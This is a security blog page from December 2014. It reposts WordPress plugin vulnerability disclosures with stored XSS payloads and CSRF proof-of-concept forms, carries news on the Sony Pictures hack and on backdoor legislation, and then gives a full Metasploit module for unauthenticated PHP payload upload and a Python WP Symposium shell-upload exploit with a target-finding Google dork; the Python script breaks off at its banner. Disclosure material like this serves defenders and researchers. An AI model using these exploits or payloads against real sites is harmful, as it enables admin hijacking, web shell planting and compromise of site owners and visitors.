MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

20Dec/140

WordPress PWG Random 1.11 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in PWG Random Wordpress Plugin 
# Author: Manideep K  
# CVE-ID : CVE-2014-9394
# Plugin Homepage: https://wordpress.org/plugins/pwgrandom/
# Version Affected: 1.11 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter:  pwgrandom_title, pwgrandom_category etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
Steps to Reproduce: (POC):
After installing the plugin
 
Stored XSS: 
1.  Goto settings -> PWGRandom
2.  Enter this payload – “ "><script>alert(32)</script> “ in any of the columns. There is no minimum input validation. Characters are being accepted where only option is to enter numbers.
3.  Save changes and see XSS in action
4.  Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=pwgrandom" method="POST">
      <input type="hidden" name="pwgrandom_submit_hidden" value="Y" />
      <input type="hidden" name="pwgrandom_title" value="test" />
      <input type="hidden" name="pwgrandom_category" value="blah blahhhhh" />
      <input type="hidden" name="pwgrandom_path" value="hi" />
      <input type="hidden" name="pwgrandom_url_path" value="dmdmdm" />
      <input type="hidden" name="pwgrandom_size" value="this is not number " />
      <input type="hidden" name="pwgrandom_nb_images" value="dddff" />
      <input type="hidden" name="pwgrandom_nb_images_row" value="1" />
      <input type="hidden" name="pwgrandom_nb_image_spacing" value="dss" />
      <input type="hidden" name="Submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(34)

20Dec/140

WordPress Twitter 0.7 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in Post to Twitter Wordpress Plugin 
# Author: Manideep K
# CVE-ID: CVE-2014-9393  
# Plugin Homepage: https://wordpress.org/plugins/post-to-twitter/
# Version Affected: 0.7  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all three fields, to name one - idptt_twitter_username 
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Goto settings -> Post to Twitter
2. Insert this payload “ "><script>alert(32)</script> “ into any/all the fields
Update options and see XSS in action
3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="idptt_twitter_username" value=" csrf baby" />
      <input type="hidden" name="idptt_twitter_password" value="123@admiN" />
      <input type="hidden" name="idptt_tweet_prefix" value="hey testt - this is also xss ed " />
      <input type="hidden" name="idptt_notify_twitter" value="1" />
      <input type="hidden" name="ak_action" value="idptt_update_settings" />
      <input type="hidden" name="submit" value="Update Post to Twitter Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************

(23)

17Dec/140

Sony cancels premiere of The Interview after hacker terrorist threats

Sony cancels premiere of The Interview after hacker terrorist threats

SONY PICTURES has cancelled the New York premiere of controversial film The Interview after hackers who breached the firm's systems last month posted threats on text-sharing site Pastebin.

Sony has also told cinema owners that they can cancel screenings of the comedy after the group responsible for the hack threatened theatres that chose to show it.

The hacker group, which goes by the name of Guardians of Peace (GOP), posted the message on Tuesday, invoking the 9/11 terrorist attacks and warning cinemagoers to avoid seeing the movie, which is about an assassination attempt on North Korean dictator Kim Jong-un.

"We will clearly show it to you at the very time and places The Interview be shown, including the premiere, how bitter fate those who seek fun in terror should be doomed to," the message warned.

Sony warned its current and former employees on Tuesday to be aware that hackers could use their stolen data, including detailed personal information, after the epic breach on its systems last month.

According to Reuters, the company said that the hackers could use private information such as social security numbers, credit card details, bank account information, healthcare information and compensation and other employment-related information.

The warning comes just days after the producers of the upcoming James Bond film confirmed that an early version of the script was among the material stolen by hackers in the same breach.

Eon Productions, which has produced 23 James Bond films since 1962, said it learned of the leak of the screenplay on Saturday.

"An early version of the screenplay for the new Bond film Spectre is amongst the material stolen and illegally made public by hackers who infiltrated the Sony Pictures Entertainment computer system," a statement reads on the movie's official website.

In case you missed it, Sony Pictures Entertainment's servers were breached on 25 November and there has been a plethora of reports regarding leaked emails and information about major Hollywood movies, deals and celebrities ever since.

The hackers have also threatened the firm, leaked its remake of Annie, and posted Sylvester Stallone's social security number online.

The stolen Spectre screenplay hasn't yet been published, but Eon Productions is worried that the hackers might make some or all of its contents public at some point in the near future.

"The screenplay for Spectre is the confidential information of Metro-Goldwyn-Mayer Studios and Danjaq LLC, and is protected by the laws of copyright in the UK and around the world," the statement continues.

"It may not (in whole or in part) be published, reproduced, disseminated or otherwise utilised by anyone who obtains a copy of it.

"Metro-Goldwyn-Mayer Studios and Danjaq LLC will take all necessary steps to protect their rights against the persons who stole the screenplay, and against anyone who makes infringing uses of it or attempts to take commercial advantage of confidential property it knows to be stolen."

Last week, a note reportedly from the group of hackers currently assaulting Sony Pictures, denied reports of employee blackmailing, and challenged the authorities and told the firm to not release controversial comedy The Interview.

The note has been published to Github and we cannot confirm that it is from the Guardians of Peace group. But that is who it claims to be from.

"We are the GOP working all over the world. We know nothing about the threatening email received by Sony staffers, but you should wisely judge by yourself why such things are happening and who is responsible for it," it said.

"We have already given our clear demand to the management team of Sony, however, they have refused to accept."

The message accuses Sony of concentrating on tracing the hacker group when it should be complying to its demands.

It suggested that Sony and the FBI are wasting their time, and advised against the release of The Interview, which is described as an act of "terrorism".

"It seems that you think everything will be well if you find out the attacker, while not reacting to our demand. We are sending you our warning again. Do carry out our demand if you want to escape us," it added.

"And stop immediately showing the movie of terrorism which can break the regional peace and cause the War! You, Sony & FBI cannot find us. We are perfect as much. The destiny of Sony is totally up to the wise reaction & measure of Sony."

North Korea has officially dismissed suggestions that it is directly behind the attack on Sony Pictures, but did concede that it could be the work of one of its glorious supporters.

The official North Korean News Agency - sorry, the glorious official North Korean News Agency - has posted its official response to what the government has called "rumours".

"We do not know where in America Sony Pictures is situated and for what wrongdoings it became the target of the attack, nor do we feel the need to know about it," said the agency.

"What we clearly know is that Sony Pictures is the very one which was going to produce a film abetting a terrorist act while hurting the dignity of the supreme leadership of the Democratic People's Republic of Korea [DPRK] by taking advantage of the hostile policy of the US administration towards the DPRK."

This, it added, could have inspired a glorious citizen to react, because, as it has already said, Sony is producing a film that makes a monkey out of its supreme leader.

"The hacking into Sony Pictures might be a righteous deed of the supporters and sympathisers with the DPRK in response to its appeal," it added, while suggesting that its closest neighbour may be fanning the rumour fires.

"What matters here is that the US set the DPRK as the target of the investigation, far from reflecting on its wrongdoings and being shameful of being taken unawares.

"And the South Korean group, keen on serving its master, groundlessly linked the hacking attack with the DPRK and floated the 'story about the north's involvement', an indication of its inveterate bitterness towards its country fellowmen."

The so-called GOP hacker group broke into Sony's computer system in November and leaked movies and employee information, making it one of the biggest ever cyber security breaches. Now it has begun threatening staff.

"We understand that some of our employees have received an email claiming to be from GOP," a Sony Pictures spokesperson told CNN. "We are aware of the situation and are working with law enforcement."

The FBI has been informed of the emails and is investigating the "person or group responsible for the recent attack on the Sony Pictures network".

Earlier this week it was revealed that Sony didn't make it too difficult for the hackers to breach its systems, and held passwords in a file named 'passwords'.

The hack is playing out badly for Sony and not a day goes by when we are not treated to another revelation from leaked documents or hushed insiders.

The password file included log-ins for services like Facebook and something called MySpace - no, us neither - and suggests that someone at Sony needs a lesson in security, or at the very least, a lesson in file-naming.

This is not the end of revelations that elicit a 'facepalm' response, as we have also learned that Sony has shed a load of social security numbers, including those belonging to Sylvester 'Rocky/Rambo' Stallone and some 47,000 others.

Data management software firm - natch - Identity Finder, trawled through the documents and found details from as far back as 1995. Around a third of social security numbers belonged to current or former Sony employees.

"As we have seen from the myriad data breaches this year, every organisation is vulnerable to an attack," said the firm in a statement.

"Security technologies are an important shield, but minimising the target and reducing the footprint of sensitive data is more critical than ever."

Yesterday security researchers from Trend Micro picked apart malware described in a recent FBI malware warning, and traced it back to the attacks on Sony.

The firm analysed the FBI document and was able to identify the code in question, which it has called BKDR_WIPALL.

Before this image was found the team was not so sure, and declined to link Sony and the attack.

"TrendLabs engineers were recently able to obtain a sample of the 'destructive malware described in reports about the FBI warning to US businesses last December 2'," said the first report from the firm.

"As of this writing, the link between the Sony breach and the malware mentioned by the FBI has yet to be verified."

That did not last long, however, and after some additional probling the researchers pulled out a plum of a piece of evidence.

"This appears to be the same wallpaper described in reports about the recent Sony hack last November 24 bearing the phrase ‘hacked by #GOP'," they wrote about the image.

"Therefore we have reason to believe that this is the same malware used in the recent attack on Sony Pictures."

Sony is still in something of a denial stage, and in a kind of Luddite paradise, and is low on comment about the situation.

The Guardian has seen an internal memo from the company that speaks of the grave situation and how it affects everybody.

"It is now apparent that a large amount of confidential Sony Pictures Entertainment data has been stolen by the cyber attackers, including personnel information and business documents," Sony said, according to the report.

"This is the result of a brazen attack on our company, our employees and our business partners. This theft of Sony materials and the release of employee and other information are malicious criminal acts."

The high-profile hack is turning into a saga, with reports now claiming that the firm's PlayStation servers are being used to distribute data pilfered during the attack.

That's according to security researcher Dan Tentler and a report at Forbes, which claims that Sony PlayStation servers are being used to distribute a 27.78GB archive potentially containing sensitive data swiped from Sony Pictures computers.

Tentler examined the data being shared, and found that some of the hosts contained SSL certificates straight from Sony.

It's unclear what exactly is going, and Sony has yet to comment. We'll update when we hear more.

This revelation comes a day after the FBI threw its hands into discussions about the hack, at the same time as it emerged that North Korea could be to blame.

The FBI sent out a 'Flash warning' to US businesses with the request that they do not share it with the papers.

Fortunately for people like us, not everyone was listening and one outfit ran to Reuters with the information.

Reuters reports that the document fingers North Korea for an assault on an unnamed outfit in the US. North Korea has since refused to deny involvement in the hack.

The country is reportedly miffed about an upcoming Sony Pictures film about leader Kim Jong-un, called The Interview, which has already caused the North Korean government to complain to the United Nations and the US.

Reports claim that, when asked whether it was involved in the attack, a spokesman for the North Korean government replied: "Wait and see."

While some are clearly not paying attention, the FBI has warned businesses to watch out for attacks that look to separate them from their hardware and communications systems.

"The overwriting of the data files will make it extremely difficult and costly, if not impossible, to recover the data using standard forensic methods," the report said.

The real nut of this would be the actual report, but the FBI has told us in the past that, while it shares such information with businesses, it does not provide the same service to journalists.

While we wait for the agency to respond on this occasion we recall a time in October when we asked for access to a similar document with a Chinese-flavoured warning.

"The FBI's recent notification to our industry partners provides recipients with information they can use to help determine whether their systems have been compromised by these actors, and provides steps they can take to mitigate any continuing threats," it said at the time.

"The FBI continues to aggressively investigate, disrupt and dismantle criminal networks that pose a threat in cyberspace."

Sony Pictures is into its second week of being held in the grasp of hackers with a motive.

The firm is being held to a kind of ransom by a hacker group called GOP and is facing down threats to release information that it would reportedly rather not release.

On top of this, Sony Pictures has lost control over some social media accounts and internal communications systems.

Now some of its movie releases, including Fury with one Brad Pitt, have been leaked in a viewable DVD screener format, suggesting that the hackers have entertainment industry crown jewels, i.e. actual movie content.

TorrentFreak, which ranks the most downloaded movies on BitTorrent on a weekly basis, finds that Fury, a new entry to the list, is the fifth most popular item already.

Around five titles from the Sony camp are in the wild, including a remake of the Annie musical. You have been warned.

According to other reports, Sony has hired the services of security firm Mandiant, which is part of FireEye, to aid in the clean up and, presumably, forensic work.

We have asked both parties to comment on this, or confirm the arrangement. Mandiant declined.

Fonte: http://www.theinquirer.net/inquirer/news/2383278/gop-hackers-brings-sony-pictures-to-its-knees-with-ransom-demand
(97)

16Dec/140

Senator: Backdoor for the Feds is a backdoor for hackers

Senator Backdoor for the Feds is a backdoor for hackers

A US Senator is urging Congress to pass laws forbidding Uncle Sam's spies from forcing software and hardware makers to build backdoors.

In an op-ed posted in the LA Times, Sen. Ron Wyden (D-OR) said that there was no safe way to build backdoors into phones, tablets, computers and software without exposing them to hackers to exploit.

Wyden, who this month proposed a bill to ban government agencies from mandating backdoors, noted the mechanisms US agencies want to use for law enforcement and intelligence will double as open invitations for foreign agencies and criminals to pwn devices.

"The problem with this logic is that building a back door into every cellphone, tablet, or laptop means deliberately creating weaknesses that hackers and foreign governments can exploit," Wyden wrote.

"Mandating back doors also removes the incentive for companies to develop more secure products at the time people need them most; if you're building a wall with a hole in it, how much are you going invest in locks and barbed wire?"

Mandatory backdoors in devices and code are a hot topic: g-men argue that being able to tunnel into devices is essential to saving lives by detecting and preventing crime. Privacy advocates, meanwhile, have argued that the tools are a violation of privacy and a major security threat.

Put Senator Wyden firmly in the latter category. He notes that even the government agencies themselves have proven less-than-trustworthy when it comes to handling data collected from citizen devices.

"For years, officials of intelligence agencies like the NSA, as well as the Department of Justice, made misleading and outright inaccurate statements to Congress about data surveillance programs — not once, but repeatedly for over a decade," he said.

"These agencies spied on huge numbers of law-abiding Americans, and their dragnet surveillance of Americans' data did not make our country safer."

Fonte: http://www.theregister.co.uk/2014/12/15/us_senator_to_congress_close_all_the_backdoors/
(89)

16Dec/140

WordPress SPNbabble 1.4.1 CSRF / XSS

# Title: CSRF/XSS Vulnerability in SPNbabble WP Plugin 
# Author: Manideep K  
# CVE-ID:  CVE-2014-9339
# Plugin Homepage: https://wordpress.org/plugins/spnbabble/
# Version Affected: 1.4.1 (probably lower versions)
# Severity: High 
 
# About Plugin:
SPNbabble (http://spnbabble.sitepronews.com) allows users to create an account and post 140 character blogs with urls to send out messages to your followers. Through the professional setup of SPNbabble you can also auto connect to Twitter, Friendfeed, Plurk, Tumblr, Facebook, Zannel, Youare, Meemi & Utterli. This plugin once installed allows you to enter your SPNbabble user and password and you can choose which blog posts will be converted into mini blogs. Your blog turned into several mini blogs on the most popular social media platforms is a great way to keep your message strong.
 
# Description: 
# Vulnerable Parameter: username, password etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# Steps to Reproduce: (POC):
After installing the plugin
You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action
Almost majority of the fields are vulnerable to CSRF + XSS attack
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=spnbabble.php" method="POST">
      <input type="hidden" name="username" value="csrf testing" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="blogname" value="" />
      <input type="hidden" name="postprefix" value="New Blog Post:" />
      <input type="hidden" name="spn_enable" value="Yes" />
      <input type="hidden" name="spn_update" value="Yes" />
      <input type="hidden" name="info_update" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
# Recommendations:
a) Use proper input filtering techniques
b) Use unique tokens such as nonces
 
# Mitigation: 
Plugin Closed
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(77)

16Dec/140

WordPress DandyID Services ID 1.5.9 CSRF / XSS

# Title: CSRF/XSS Vulnerability in DandyID Services WP Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9335
# Plugin Homepage: https://wordpress.org/plugins/dandyid-services/
# Version Affected: 1.5.9 (probably lower versions)
# Severity: High 
 
# About Plugin:
DandyID is a free service that enables you to connect, manage, and share all of your online identities from a single location
 
# Description: 
# Vulnerable Parameter: email_address, sidebarTitle etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# Steps to Reproduce: (POC):
After installing the plugin
 
You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action
Almost majority of the fields are vulnerable to CSRF + XSS attack
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=dandyid-services/dandyid-services.php" method="POST">
      <input type="hidden" name="email_address" value="csrf testing" />
      <input type="hidden" name="sidebarTitle" value="" />
      <input type="hidden" name="show_style" value="BOTH" />
      <input type="hidden" name="show_powered_by" value="TRUE" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Recommendations:
a) Use proper input filtering techniques
b) Use unique tokens such as nonces
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(72)

16Dec/140

WordPress twitterDash 2.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in twitterDash Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9368
# Plugin Homepage: https://wordpress.org/plugins/twitterdash/
# Version Affected: 2.1 (probably lower versions)
# Severity: High 
 
#About Plugin:
twitterDash adds a field on the Dashboard. In this field you find the last(you can define how many) updates on the friends timeline of your twitter(http://www.twitter.com) account.You will see your friends profile images, usernames and updates, all the links that they have posted are active and the "@username" links to that users timeline. Enable the update panel and you can update your own timeline from your Dashboard. This plugin does not require the PHP cURL-extension, you can run this on every server.
 
# Description: 
Vulnerable Parameter: all three text boxes, to name one - username_twitterDash
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Goto settings -> TwitterDash
2. Insert this payload “ "><script>alert(32)</script> “ into any/all fields
Update options and see XSS in action
3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=twitterDash.php" method="POST">
      <input type="hidden" name="username_twitterDash" value="csrf baby" />
      <input type="hidden" name="password_twitterDash" value="hi" />
      <input type="hidden" name="count_twitterDash" value="hi" />
      <input type="hidden" name="update_twitterDash" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
 
# Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************

(61)

16Dec/140

WordPress iTwitter WP 0.04 CSRF / XSS

# Title: CSRF/XSS Vulnerability in iTwitter WP Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9336
# Plugin Homepage: https://wordpress.org/plugins/itwitter/
# Version Affected: 0.04 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter: itex_t_twitter_username, itex_t_twitter_userpass etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# Steps to Reproduce: (POC):
After installing the plugin
 
You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action
Almost majority of the fields are vulnerable to CSRF + XSS attack
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=iTwitter.php" method="POST">
      <input type="hidden" name="itex_t_twitter_username" value="csrf testing" />
      <input type="hidden" name="itex_t_twitter_userpass" value="" />
      <input type="hidden" name="itex_t_cache_enable" value="0" />
      <input type="hidden" name="itex_t_cache_time" value="3600" />
      <input type="hidden" name="itex_t_cache_where" value="0" />
      <input type="hidden" name="itex_t_cache_file" value="C:\wamp\www\wordpress\wp-content\plugins\itwitter\iTwitterCacheFile.txt" />
      <input type="hidden" name="global_debugenable" value="0" />
      <input type="hidden" name="global_debugenable_forall" value="0" />
      <input type="hidden" name="global_widget" value="0" />
      <input type="hidden" name="global_collapse" value="1" />
      <input type="hidden" name="itex_t_shorturls_service" value="random" />
      <input type="hidden" name="itex_t_post2twitter_enable" value="0" />
      <input type="hidden" name="itex_t_post2twitter_template" value="%title% %excerpt% %url%" />
      <input type="hidden" name="itex_t_replace_links_enable" value="0" />
      <input type="hidden" name="itex_t_last_tweets_enable" value="0" />
      <input type="hidden" name="itex_t_last_tweets_users" value="" />
      <input type="hidden" name="itex_t_last_tweets_pos" value="footer" />
      <input type="hidden" name="info_update" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
 
# Recommendations:
a) Use proper input filtering techniques
b) Use unique tokens such as nonces
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(62)

16Dec/140

WordPress Download Manager Unauthenticated File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
    info,
    'Name'           => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
    'Description'    => %q{
      The WordPress download-manager plugin contains multiple unauthenticated file upload
      vulnerabilities which were fixed in version 2.7.5.
    },
    'Author'         =>
    [
      'Mickael Nadeau',     # initial discovery
      'Christian Mehlmauer' # metasploit module
    ],
    'License'        => MSF_LICENSE,
    'References'     =>
    [
      # The module exploits another vuln not mentioned in this post, but was also fixed
      ['URL', 'http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html'],
      ['WPVDB', '7706']
    ],
    'Privileged'     => false,
    'Platform'       => ['php'],
    'Arch'           => ARCH_PHP,
    'Targets'        => [['download-manager < 2.7.5', {}]],
    'DefaultTarget'  => 0,
    'DisclosureDate' => 'Dec 3 2014'))
    end
 
    def check
      check_plugin_version_from_readme('download-manager', '2.7.5')
    end
 
    def exploit
      filename = "#{rand_text_alpha(10)}.php"
 
      data = Rex::MIME::Message.new
      data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
 
      print_status("#{peer} - Uploading payload")
      res = send_request_cgi(
        'method'   => 'POST',
        'uri'      => normalize_uri(wordpress_url_backend, 'post.php'),
        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
        'data'     => data.to_s,
        'vars_get' => { 'task' => 'wpdm_upload_files' }
      )
 
      if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
        uploaded_filename = res.body
        register_files_for_cleanup(uploaded_filename)
        print_status("#{peer} - File #{uploaded_filename} successfully uploaded")
      else
        fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
      end
 
      file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename)
 
      print_status("#{peer} - Calling uploaded file #{file_path}")
      send_request_cgi(
        {
          'uri'    => file_path,
          'method' => 'GET'
        }, 5)
    end
  end

(51)

14Dec/140

WordPress WP Symposium 14.11 Shell Upload

#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27:  Discovered vulnerability
# 2014-12-01:  Vendor Notification (Twitter)
# 2014-12-02:  Vendor Notification (Web Site) 
# 2014-12-04:  Vendor Notification (E-mail)
# 2014-12-11:  No Response/Feedback
# 2014-12-11:  Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
#   if ($_FILES["file"]["error"] > 0) {
#       echo "Error: " . $_FILES["file"]["error"] . "<br>";
#   } else {
#       $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
#       //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
#       $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
#       //echo "Extension: " . $ext . "<br />";
#       if (strpos($allowedExts, $ext)) {
#       $extAllowed = true;
#       } else {
#           $extAllowed = false;
#       }
#       //echo "Type: " . $_FILES["file"]["type"] . "<br>";
#       //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
#       //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
#       if (!$extAllowed) {
#           echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
#       } else {
#           // Copy file to tmp location
#   ...
#   ...
#   ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
 
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
 
   getfields = dict()
   getfields['uploader_uid'] = '1'
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload
 
   payloadcontent = open(payloadname).read()
 
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'
 
   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
 
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
 
banner = """
  ___ ___               __
 |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
 |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
 |:      |                |__|
 |::.|:. |
 `--- ---'
  ___ ___ _______        _______                                  __
 |   Y   |   _   |______|   _   .--.--.--------.-----.-----.-----|__.--.--.--------.
